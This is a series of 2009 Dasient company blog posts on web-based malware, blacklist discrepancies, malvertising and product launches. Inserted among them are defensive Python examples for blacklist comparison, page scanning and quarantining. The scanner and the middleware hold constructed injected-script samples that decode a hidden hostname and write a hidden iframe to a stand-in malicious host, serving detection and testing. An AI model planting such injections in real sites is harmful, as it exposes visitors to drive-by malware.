Monday, September 28, 2009

Dasient details new attack @ Cyber Security East

Late last week I gave a talk at the Cyber Security East Conference in Washington, DC. Some of the other speakers included Robert Lentz (Deputy Assistant Secretary of Defense), Dr. Eric Cole (Chief Scientist of Lockheed Martin), and Robert Carey (Chief Information Officer, Department of the Navy). There was a lot of interesting and useful discussion, and I was glad to be able to contribute to the event.

In my talk, I reviewed the fundamental shift we've seen in the way malware is spreading, focusing on the 600% increase in web-based malware in the last two years. These attacks -- in which legitimate sites are compromised and turned into delivery vehicles for malware -- are impacting more than a million webpages per month, and in turn more and more legitimate sites are being blacklisted by major search engines, browsers, and AV companies.

I also shared a few examples of how web-based malware attacks are growing more sophisticated, based on data we've gathered in the last year using our proprietary malware analysis platform. As you may know, some web-based malware attacks can be attributed to a single injection of an iFrame or JavaScript code snippet, with a relatively obvious malicious domain in the SRC of the iFrame. Others employ heavily obfuscated JavaScript that can often be hundreds of characters long, and as such can be more difficult to spot or remove from an infected site -- but they still use a single injection point.

We are now starting to see attackers insert code via multiple injection points, to further obfuscate the bad code and make it more difficult for webmasters and traditional scans to detect. In the screenshot below is an example of this kind of attack that I presented last week:


Note that the attacker has injected JavaScript here, but it is not obfuscated, and it doesn't appear to point to a malicious domain. Hence, anyone who does a simple check for malicious domains may be easily fooled into thinking that the JavaScript is innocuous. The reality is quite different: the call to "getElementById" in the JavaScript reaches into another part of the document (where the first injection took place) to retrieve and decode the malicious domain. Once the domain is decoded (in the second injection), the attacker's domain is revealed to be the source of a malicious iFrame.

This new attack makes it clear that the purveyors of web-based malware are actively looking for ways around malware scans, and it underlines the importance of going above and beyond signature-based analysis in the battle against this threat. For example, the Dasient WAM malware-analysis platform was able to proactively capture this new multiple-injection attack in no small part because of its strengths in behavioral analysis. We believe that as the web becomes more sophisticated and as attackers continue to embrace new, increasingly automated attack vectors, businesses on the web will need to deploy protections that work at web speed and web scale to keep themselves safe.

To learn more about how Dasient WAM can help you protect your site, check out our product overview.

Wednesday, August 19, 2009

Dasient @ HostingCon 2009

Readers of this blog will know that the Dasient team was at HostingCon 2009 in Washington DC last week. The show was great -- busy, but very engaging. We had a booth in the exhibit hall, and hosted a party for some of the show's attendees. Neil gave a talk on the rising threat of web-based malware in the "Emerging Trends" track, and we launched a new open source tool called Mod Anti-Malware Lite to help web hosts, site owners, and developers protect themselves. We were also named one of the five "must see" companies at the show by Web Host Magazine.

But, without question, the most rewarding part of the experience was the opportunity to interact with so many people from the web hosting community. We learned a lot about the challenges that web hosts of all sizes are facing on the security front, and talked to several companies whose customers had been infected with web-based malware and / or blacklisted in recent months (one company had seen more than a quarter of its domains infected by Gumblar). We also got a lot of great feedback on Dasient WAM and the ways it's helping hosts address these threats.

For those of you we missed at the show, be sure to check out our new partner center, where you can sign your customer domains up for free blacklist monitoring, download Mod Anti-Malware Lite, and more. And for the rest of you, check out our pics from the event below!






Tuesday, August 11, 2009

Dasient launches Web Anti-Malware Lite

The Dasient team is at HostingCon 2009 this week, and today we've made a few announcements that we're really excited about. Here's an excerpt from the release we put out this morning:

Dasient Releases Free Open-Source Web Anti-Malware Technology

Test version of Dasient WAM remediation technology enables site owners and web hosts to keep their sites from infecting users in the event of a malware infection

Dasient also launches partner center and announces new distribution partnerships with web hosting providers

WASHINGTON DC - August 11, 2009 - Today at HostingCon 2009, Dasient launched Mod Anti-Malware Lite, an open source version of its Web Anti-Malware (WAM) remediation technology. Mod Anti-Malware Lite is an Apache server module that will help site owners, web hosts, and developers protect themselves against the effects of web-based attacks that can compromise their sites and spread malware to their users. Mod Anti-Malware Lite will be made available today at www.dasient.com/partners and www.sourceforge.net.

"Every day, thousands of legitimate websites are infected with malicious code, and the speed, scale, and complexity of these attacks makes it difficult for website owners to identify and address the resulting infections," said Dr. Neil Daswani, one of Dasient's three co-founders. "Now more than ever it's important for site owners to deploy defenses that can operate at the scale and speed required to deal with the problem."

The most immediate result of web malware infection is blacklisting by search engines like Google and Yahoo; browsers like Internet Explorer, Firefox, and Chrome; and desktop anti-virus providers like Norton and McAfee. Blacklisting can have a significant impact on site traffic, reputation, and revenue, and using Dasient's Web Anti-Malware service can help sites stay off these blacklists. Dasient WAM is the only web anti-malware service on the market that can monitor, automatically identify, and quarantine malware on websites before it can infect visitors and cause a loss of traffic, reputation, and revenue.

Dasient is making Mod Anti-Malware Lite available as open source so that web hosts, site owners, and developers can test the Dasient WAM technology on their sites and explore different uses of the technology. When used in conjunction with the Dasient WAM monitoring and diagnostic service, the module will prevent any page that's been infected with malware from being served to users. Anyone who downloads and installs Mod Anti-Malware Lite will be granted a limited free trial of the Dasient WAM monitoring and diagnostic service, to be used in conjunction with the module.

Compared with the technology offered in Mod Anti-Malware Lite, the remediation technology in the premium service takes things a step further, removing any dangerous code but still serving the rest of the page to users, so site owners both protect their users from infection and stay open for business.

Also today, Dasient is launching a new partner center at www.dasient.com/partners. The partner center is designed to be a resource for web hosting providers, enabling them to quickly and easily sign their customer domains up for free blacklist monitoring, download Mod Anti-Malware Lite, and more.

Dasient is also happy to announce new distribution partnerships with five web hosting providers: Consolidated, Vexxhost, Ultrahosting, and Nerds on Site in North America and Diadem Technologies in India. These partners will be integrating Dasient WAM into their product platforms in the coming months, selling the product to their customers and sharing revenue with Dasient.

If you'd like to learn more about the Dasient WAM service, check out our product overview. If you'd like to download Mod Anti-Malware Lite and get started right away, head over to the new partner center.

And if you're at the show, be sure to catch the session by our own Neil Daswani at 4:00 pm today in the "Emerging Trends" track at the conference. Neil will be discussing the rising threat of web-based malware, and what web hosts of all sizes can do to protect themselves and their customers. Also be sure to swing by our booth for a demo of the Dasient WAM technology or to sign up for free blacklist monitoring in our new partner center. We're in booth 312 -- see you there!

Thursday, August 6, 2009

Dasient Co-Founder Neil Daswani Gives Talk At Google

Last week, Neil was invited by Google engineer David Turner to give a talk at Google on "Mitigating Web-Based Malware Attacks." In the talk, Neil discussed the problem of web-based malware, and the ways we can all work together as a community to address it. The full video of the talk has been posted on YouTube:



Enjoy!

Wednesday, July 22, 2009

How does a web page harm thee? Let me count the ways....

As the web grows and diversifies, so do the number of ways in which web pages can harm users (for example). To help counter this threat, Google, Norton, and McAfee maintain "blacklists" that warn users away from potentially unsafe webpages. But what exactly does it mean to get blacklisted by these services? Do the lists agree on which sites are harmful?

When analyzing a blacklist, the primary fact to keep in mind is that the term "bad" is not well defined. As such, each list operates under different criteria. Google, for example, focuses on technical threats such as drive-by downloads. McAfee and Norton take a broader view, and will flag a site based on things like "annoyance factors" or "excessive popups." McAfee also signs up for any mailing lists it finds and records the amount of spam generated. Google limits itself to a binary response marking a site as potentially harmful (e.g., "This site may harm your computer") or not, while McAfee and Norton label websites as "Safe," "Caution," "Warning," or "Untested."

Given these divergent criteria, the first thing that is immediately apparent is that it would be much too simplistic to call all blacklisted sites "malicious," while calling all non-blacklisted sites "safe." To see how similar or different these blacklists are in practice, we took a set of relatively popular domains on the Internet and queried all three lists.

Of the sites that were flagged by at least one of the blacklists:
  • 57% were marked as potentially harmful or "Warning," with the other 43% marked as "Caution."
  • Google flagged 5.2% with a "This site may harm your computer" label.
  • Norton flagged 16.3% of the sites with a rating of "Warning," and another 14.4% with a rating of "Caution."
  • McAfee flagged 38.6% of the sites with a rating of "Warning," and another 32% with a rating of "Caution."

Per the statistics above, Google's list was by far the smallest, reflecting its focus on technical threats. Norton had far more "untested" sites than McAfee, partially explaining Norton's lower numbers.

When we compare which sites were blacklisted, however, the results become far more interesting. Of the sites that Google blacklisted:
  • Norton labeled less than half with "Warning," half with "Safe," and the remaining ones as "Untested." None were labeled with "Caution."
  • McAfee labeled a quarter with "Warning," a quarter were "Untested," and the remaining half were safe. None were labeled with "Caution."
  • McAfee's users lodged complaints about more than half of the sites.

Norton and McAfee's blacklists also didn't agree with each other often. Of the sites flagged between them, only 4% were on both lists. Amazingly, the overlap between all three lists was less than 1%. Of the sites flagged "Warning" or "Harmful" by at least one list, 61% were flagged only by McAfee. Only 1% were flagged by all three lists.

These discrepancies shouldn't be surprising, given the fact that the lists employ different criteria and techniques for evaluating sites. But there are also deeper reasons for the lack of overlap: For one thing, the frequency and timing of testing can have a significant impact on the rating a site receives -- if a site is compromised after it's tested by a service, and that service doesn't test it again for another day, week, or even month, that site could end up infecting a significant number of its users while still being marked as "safe" by the service. For another, the diagnostics employed by these services aren't necessarily infallible -- web-based malware is sometimes masked to prevent its detection by some testing services.
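The comparison above only works once each provider's labels are mapped onto a common scale, and the timing caveat means a verdict is only as good as its test date. The following is an added example (not Dasient's code) that does both: it normalizes constructed verdict records from three lists, drops "Untested" and stale verdicts, and then computes the same kind of per-list, pairwise and all-three overlap figures the post reports. The provider label names, the seven-day staleness window and all domains are assumptions made for the example.

```python
"""Normalize blacklist verdicts from several providers, discard stale ones,
and measure how much the lists agree.  Added example; verdicts are constructed."""
from datetime import datetime, timedelta
from itertools import combinations

# Each provider's own vocabulary mapped onto one comparison scale (assumed labels).
# Google is modelled as binary: "harmful" (the "This site may harm your computer"
# label) or "clean"; Norton and McAfee use their four-level ratings.
NORMALIZE = {
    "google": {"harmful": "warning", "clean": "safe"},
    "norton": {"Warning": "warning", "Caution": "caution", "Safe": "safe", "Untested": "untested"},
    "mcafee": {"Warning": "warning", "Caution": "caution", "Safe": "safe", "Untested": "untested"},
}
STALE_AFTER = timedelta(days=7)  # assumption: a week-old test says little about today

# Constructed verdicts: (provider, domain, provider_label, tested_at)
NOW = datetime(2009, 7, 22)
VERDICTS = [
    ("google", "a.test", "harmful",  NOW - timedelta(days=1)),
    ("norton", "a.test", "Warning",  NOW - timedelta(days=2)),
    ("mcafee", "a.test", "Warning",  NOW - timedelta(days=30)),  # stale: ignored below
    ("google", "b.test", "clean",    NOW),
    ("norton", "b.test", "Safe",     NOW),
    ("mcafee", "b.test", "Caution",  NOW),
    ("norton", "c.test", "Untested", NOW),
    ("mcafee", "c.test", "Warning",  NOW - timedelta(days=3)),
    ("google", "d.test", "clean",    NOW),
    ("norton", "d.test", "Warning",  NOW),
    ("mcafee", "d.test", "Warning",  NOW),
]


def normalized(verdicts=VERDICTS, now=NOW):
    """Return {provider: {domain: rating}} with untested and stale verdicts dropped."""
    out = {}
    for provider, domain, label, tested_at in verdicts:
        rating = NORMALIZE[provider][label]
        if rating == "untested" or now - tested_at > STALE_AFTER:
            continue
        out.setdefault(provider, {})[domain] = rating
    return out


def flagged_sets(verdicts=VERDICTS, now=NOW, levels=("warning",)):
    """Return {provider: set of domains carrying one of `levels`} (fresh verdicts only)."""
    return {p: {d for d, r in m.items() if r in levels}
            for p, m in normalized(verdicts, now).items()}


def agreement(verdicts=VERDICTS, now=NOW):
    """Per-list flag counts, pairwise overlaps, sites flagged by all lists, and
    sites flagged by exactly one list."""
    sets = flagged_sets(verdicts, now)
    union = set().union(*sets.values())
    pairwise = {f"{a}&{b}": len(sets[a] & sets[b])
                for a, b in combinations(sorted(sets), 2)}
    return {
        "flagged_by_any": len(union),
        "per_list": {p: len(s) for p, s in sorted(sets.items())},
        "pairwise": pairwise,
        "flagged_by_all": len(set.intersection(*sets.values())),
        "only_one_list": sum(1 for d in union
                             if sum(d in s for s in sets.values()) == 1),
    }


if __name__ == "__main__":
    print(agreement())
```

With the constructed data, `a.test` is flagged by Google and Norton but McAfee's month-old verdict is discarded, so no domain is flagged by all three lists, which is the kind of result the post describes. Re-running `agreement()` with a longer `STALE_AFTER` shows how much the overlap figures depend on the freshness policy.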

So what does all this mean for protecting your business? How should you deal with the fact that there are so many blacklists out there, testing your site on several different criteria and with varying levels of effectiveness? At Dasient, we believe the answer is being proactive about monitoring and protecting your site from web-based malware. To learn how we can help you do that, click http://wam.dasient.com.

Tuesday, July 7, 2009

Attackers infect websites via ad networks, widgets

According to reports on Twitter as well as on ZDNet over the weekend, visitors to several high-profile websites were blocked from accessing parts of the sites because an advertising partner, Eyewonder, suffered a malware attack.



Malicious advertisements are increasingly being used by attackers as a vector for distributing malware via legitimate sites. In this case, what happens is that the malicious code that the website ends up serving to users is being sourced in from an advertising partner. The website itself has not been compromised by attackers -- rather, the ad network used by the site has been compromised. Attackers often use malicious ads to achieve scale and avoid detection. It would have been difficult for the attackers to infect a large number of high-profile websites directly; instead, they were able to leverage the trusted relationship between the websites and their ad network to get malicious content (in this case an ad) served to the sites' end users. In some cases, Dasient has added certain ad networks to its internal blacklist to inform its customers where there is a risk that ads may result in infecting their users.

In addition to malware coming in through ads, we have also seen cases where malicious code comes into a website via content mash-ups or third-party widgets. For example, third-party widgets such as traffic counters have been used to infect websites (see section 4.4 of "The Ghost in the Browser"). We have spoken to website owners who explained that their sites were infected not through attackers exploiting a vulnerability in the website, but because they included a plug-in or widget that ended up being malicious. In some cases, the widget is benign for a period of time (even years), but then drastically changes behavior to become malicious (either because the widget provider was itself malicious or, more likely, because the widget provider's servers were hacked).

Attackers will continue to find network and web application vulnerabilities in websites that they can exploit to directly plant malicious code. However, it is clear from the Eyewonder incident that the attackers will also seek ways of exploiting the trusted relationships between websites and their third-party advertising or content partners to create the same effect. The nature of the open web encourages websites to mash up best-of-breed content (and ads) from various sources. To reduce risk, it is important for websites to perform due diligence on all third-party content and ad providers, as well as employ automated detection and remediation services.
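Two of the detection gaps described on this page are easy to check for statically: the multiple-injection attack from the Cyber Security East post, where an unobfuscated script reads an encoded string out of another injected element and only then builds the malicious iFrame, and the third-party risk described here, where the page itself is clean but pulls script from an ad or widget origin that was never vetted. The following is an added example (not Dasient's code or the Mod Anti-Malware module) that parses a constructed page once and reports both: external script/iframe origins missing from a site-specific allowlist, and inline scripts that read an element by id and then emit an iframe. All hostnames, the element id and the allowlist are assumptions made for the example; the script-analysis rule is a simple heuristic, not a general JavaScript analysis.

```python
"""Static page scan for (a) third-party script/iframe origins not on the site's
allowlist and (b) inline scripts that assemble an iframe from content fetched
elsewhere in the DOM.  Added example; the sample page is constructed."""
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Constructed sample page: a hidden element holds a reversed hostname, and a
# separate, unobfuscated script reads it by id, reverses it and writes an
# iframe.  Neither injection contains a recognisable bad URL on its own.
SAMPLE_PAGE = """
<html><body>
<div id="t3" style="display:none">dilavni.tsoh-suoicilam</div>
<script src="https://ads.vetted-partner.test/tag.js"></script>
<script src="https://cdn.unknown-widget.test/counter.js"></script>
<script>
var s = document.getElementById('t3').innerHTML;
var d = s.split('').reverse().join('');
document.write('<iframe src="http://' + d + '/" width=0 height=0></iframe>');
</script>
</body></html>
"""

ALLOWED_ORIGINS = {"ads.vetted-partner.test"}  # hypothetical list of vetted partners


class PageCollector(HTMLParser):
    """Collects external src hostnames, inline script bodies, and text by element id."""

    def __init__(self):
        super().__init__()
        self.origins = set()
        self.inline_scripts = []
        self.text_by_id = {}
        self._in_script = False
        self._current_id = None

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag in ("script", "iframe") and a.get("src"):
            host = urlparse(a["src"]).hostname
            if host:
                self.origins.add(host)
        if tag == "script" and not a.get("src"):
            self._in_script = True
            self.inline_scripts.append("")
        if a.get("id"):
            self._current_id = a["id"]
            self.text_by_id.setdefault(a["id"], "")

    def handle_endtag(self, tag):
        if tag == "script":
            self._in_script = False
        self._current_id = None

    def handle_data(self, data):
        if self._in_script:
            self.inline_scripts[-1] += data
        elif self._current_id:
            self.text_by_id[self._current_id] += data


_READS_BY_ID = re.compile(r"getElementById\(\s*['\"]([^'\"]+)['\"]\s*\)")
_DOM_WRITE = re.compile(r"document\.write|createElement|innerHTML")


def unexpected_origins(page, allowed=ALLOWED_ORIGINS):
    """Hostnames the page loads script or frames from that are not vetted."""
    p = PageCollector()
    p.feed(page)
    return sorted(p.origins - allowed)


def dom_sourced_iframes(page):
    """(element id, element text) for each inline script that reads an element
    by id and then emits an iframe; a domain-only check would miss these."""
    p = PageCollector()
    p.feed(page)
    findings = []
    for body in p.inline_scripts:
        ids = _READS_BY_ID.findall(body)
        emits_frame = "iframe" in body.lower() and _DOM_WRITE.search(body) is not None
        if ids and emits_frame:
            findings.extend((i, p.text_by_id.get(i, "").strip()) for i in ids)
    return findings


if __name__ == "__main__":
    print("unvetted origins:", unexpected_origins(SAMPLE_PAGE))
    print("DOM-sourced iframes:", dom_sourced_iframes(SAMPLE_PAGE))
```

Used as a periodic crawl over a site's own pages, the first function turns the "due diligence on third-party providers" advice into an alert whenever a new origin appears, and the second flags loader scripts for review even when no known-bad domain is visible anywhere on the page.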

Tuesday, June 16, 2009

Introducing Dasient Web Anti-Malware (WAM)

posted by Neil Daswani, Ameet Ranadive, and Shariq Rizvi, Co-Founders, Dasient

If you've been following our blog, you'll know that we've been talking quite a bit about the latest security threats on the web. One of the threats we've been focusing on specifically is web-based malware. This kind of attack -- in which hackers compromise a legitimate site and turn it into a delivery vehicle for drive-by malware downloads -- has long been regarded as an emerging threat.

But one look at the numbers makes it clear that this threat has officially arrived: In the last two years, there's been a 600% increase in the number of malware-infected webpages, and 80% of those pages are legitimate. Google first reported the problem of malware-infected pages exploding from April 2007 to January 2008. Microsoft estimated in an April 2009 report that the total number of legitimate webpages being compromised per month is more than 1 million. And now that search engines like Google and Yahoo; browsers like IE8, Firefox, and Chrome; and desktop AV providers like Norton and McAfee are blacklisting compromised sites, those sites are seeing double-digit losses in traffic and revenue and taking significant hits to their reputation.

Those are just some of the reasons we're proud to be opening up our Dasient Web Anti-Malware service to a broader audience today. Dasient Web Anti-Malware -- or "WAM," as we like to call it -- is the world's first complete anti-malware solution for websites. Dasient WAM monitors, automatically identifies, and quarantines malware on websites, before those sites suffer significant losses in traffic, revenue, and reputation.

We're making the monitoring and diagnostic elements of WAM openly available in public beta today, and making the quarantining element available in private beta. WAM is available both to site owners and to web hosting providers interested in offering their customers protection against web-based malware. If you want to learn more, jump down to the full text of our news release, which we've included below. If you're ready to get started right away, head here to sign up for free blacklist monitoring for your site.

We're excited to be bringing these necessary protections to the web, and are looking forward to your feedback. Stay tuned to this space for more news on Dasient WAM and further insights on the development of new web-based threats.

Here is the press release:

Dasient Introduces First Web Anti-Malware Service

Addresses Growing Need for Protection From New Web-Based Attacks

PALO ALTO, June 16, 2009 – Dasient today introduced the industry's first service to protect companies against a fast-growing class of web-based attacks that compromise legitimate websites and then use them to spread malware to the sites' visitors. Dasient's new Web Anti-Malware (WAM) service continually monitors websites, diagnoses any infections, and helps businesses address the infections, before the sites suffer significant losses in traffic, revenue, and reputation.

"In the last two years, we've seen a fundamental shift in the way malware is spread," said Dasient co-founder Dr. Neil Daswani. "Hackers are using highly automated and mutable attacks to turn websites into delivery vehicles for malicious software. This is a web problem at its core, and it requires a solution that can function at web speed and web scale. That's exactly what we had in mind when we designed the Dasient WAM service."

Sharp Increase in Malware-Infected Webpages

Each day, thousands of legitimate websites are infected with malicious code, often without their knowledge. The speed, scale, and complexity of these attacks makes it extremely difficult for website owners to identify and fix the resulting infections, and in some cases to even know they've occurred.

The most immediate result of web malware infection is blacklisting by search engines like Google and Yahoo; browsers like Internet Explorer, Firefox, and Chrome; and desktop anti-virus providers like Norton and McAfee. When blacklisted, a website's visitors are redirected to a warning that the site they're about to visit might be dangerous. In many cases, being blacklisted causes a sharp drop in traffic to the site, depriving the site owner of advertising or e-commerce revenue, damaging the site's brand, and spurring additional support costs.

Dasient Identifies and Contains Malware That Can Infect Site Visitors

Today Dasient is announcing the following updates to its patent-pending Web Anti-Malware service, which has been in alpha testing with thousands of websites since early this year:

  • Free Blacklist Monitoring: Regularly monitors blacklists from search engines, browsers, and desktop anti-virus companies and provides customers with instant alerts if they've been flagged by those providers. The WAM Blacklist Monitoring service is now in public beta, and is available for free to direct customers and web hosting providers.
  • Premium Monitoring and Diagnosis: Continuously monitors customer websites for malicious code that can be distributed by web applications, user-generated content, third-party widgets, advertisements, and other vulnerable site elements. When an infection is identified, customers are notified and provided with detailed diagnostic information, including all malicious source code and infected URLs. The WAM Premium Monitoring service is now in public beta, and is available on a subscription basis to direct customers and web hosting providers.
  • Quarantining: Used in conjunction with the Premium Monitoring service, Dasient's quarantining technology automatically contains infections as soon as they're diagnosed, serving the webpages in question but not the malicious code. Quarantining prevents the site from spreading malware broadly to its visitors and keeps it from being flagged by blacklist providers. The WAM Quarantining service is now in private beta, and direct customers and web hosting providers can sign up to join the beta on the Dasient site.

The Dasient WAM monitoring and diagnostic services are built on a set of behavioral analysis technologies that continually crawl customer sites and the web, identifying new web-based malware infections. The monitoring and diagnostic tools are provided to customers as a web service, and the quarantining technology is made available as a web server module that can be installed by customers or web hosting providers.
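The two quarantine behaviours described on this page, the Mod Anti-Malware Lite behaviour from the August release (an infected page is not served at all) and the premium behaviour (the page is served with the dangerous code removed), both fit a web-server filter that sits between the scanner's diagnosis and the response. The following is an added example, not Dasient's module and not an Apache module: a WSGI middleware that consumes a constructed quarantine list of flagged code fragments per path and applies either mode. The quarantine feed format, the placeholder response, the `serve` helper and the sample upstream page are all assumptions made for the example.

```python
"""WSGI middleware that quarantines pages a scanner has flagged, either by
blocking the whole page or by stripping the diagnosed fragments.  Added
example; the quarantine feed and the upstream page are constructed."""

# Constructed scanner output: path -> exact fragments diagnosed as malicious.
QUARANTINE = {
    "/index.html": [
        '<script>document.write("<iframe src=\'http://malicious-host.invalid/\'></iframe>")</script>',
    ],
}


def upstream_app(environ, start_response):
    """Stand-in for the real site: every path returns a page with one injected script."""
    body = (b"<html><body><h1>Welcome</h1>"
            b"<script>document.write(\"<iframe src='http://malicious-host.invalid/'></iframe>\")</script>"
            b"<p>Real content</p></body></html>")
    start_response("200 OK", [("Content-Type", "text/html"),
                              ("Content-Length", str(len(body)))])
    return [body]


class QuarantineMiddleware:
    """mode="block": answer 503 with a placeholder instead of the infected page.
    mode="strip": serve the page with each flagged fragment replaced by a comment."""

    def __init__(self, app, quarantine, mode="block"):
        if mode not in ("block", "strip"):
            raise ValueError("mode must be 'block' or 'strip'")
        self.app, self.quarantine, self.mode = app, quarantine, mode

    def __call__(self, environ, start_response):
        path = environ.get("PATH_INFO", "/")
        fragments = self.quarantine.get(path)
        if not fragments:
            return self.app(environ, start_response)  # unflagged pages pass through
        if self.mode == "block":
            body = b"<html><body>This page is temporarily unavailable.</body></html>"
            start_response("503 Service Unavailable",
                           [("Content-Type", "text/html"),
                            ("Content-Length", str(len(body)))])
            return [body]
        # strip mode: buffer the upstream response, remove the fragments,
        # and recompute Content-Length before forwarding the headers.
        captured = {}

        def capture(status, headers, exc_info=None):
            captured["status"], captured["headers"] = status, headers

        body = b"".join(self.app(environ, capture))
        for fragment in fragments:
            body = body.replace(fragment.encode(), b"<!-- quarantined -->")
        headers = [(k, v) for k, v in captured["headers"] if k.lower() != "content-length"]
        headers.append(("Content-Length", str(len(body))))
        start_response(captured["status"], headers)
        return [body]


def serve(app, path):
    """Exercise a WSGI app in-process; returns (status line, body bytes)."""
    out = {}

    def start_response(status, headers, exc_info=None):
        out["status"] = status

    body = b"".join(app({"PATH_INFO": path, "REQUEST_METHOD": "GET"}, start_response))
    return out["status"], body


if __name__ == "__main__":
    for mode in ("block", "strip"):
        status, body = serve(QuarantineMiddleware(upstream_app, QUARANTINE, mode), "/index.html")
        print(mode, status, body.decode())
```

Strip mode relies on the scanner supplying the exact bytes it diagnosed; if the injected code changes between scan and request, the fragment will not match and the page is served unchanged, which is the argument for pairing stripping with continuous re-scanning rather than a one-off diagnosis.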

More information about the Dasient WAM service and pricing can be found at www.dasient.com.

About Dasient

Dasient is an Internet security company that protects businesses from web-based malware attacks. It is the first to develop a complete Web Anti-Malware service that can monitor, automatically identify, and quarantine malware on websites before it can infect visitors and cause a loss of traffic, reputation, and revenue. Dasient was founded by former Google engineers Neil Daswani and Shariq Rizvi and former McKinsey strategy consultant Ameet Ranadive. They are backed by a group of seed investors who also invested in VeriSign, Citrix, Twitter, Digg, Tumbleweed, Finjan, and more. More information about Dasient can be found at www.dasient.com.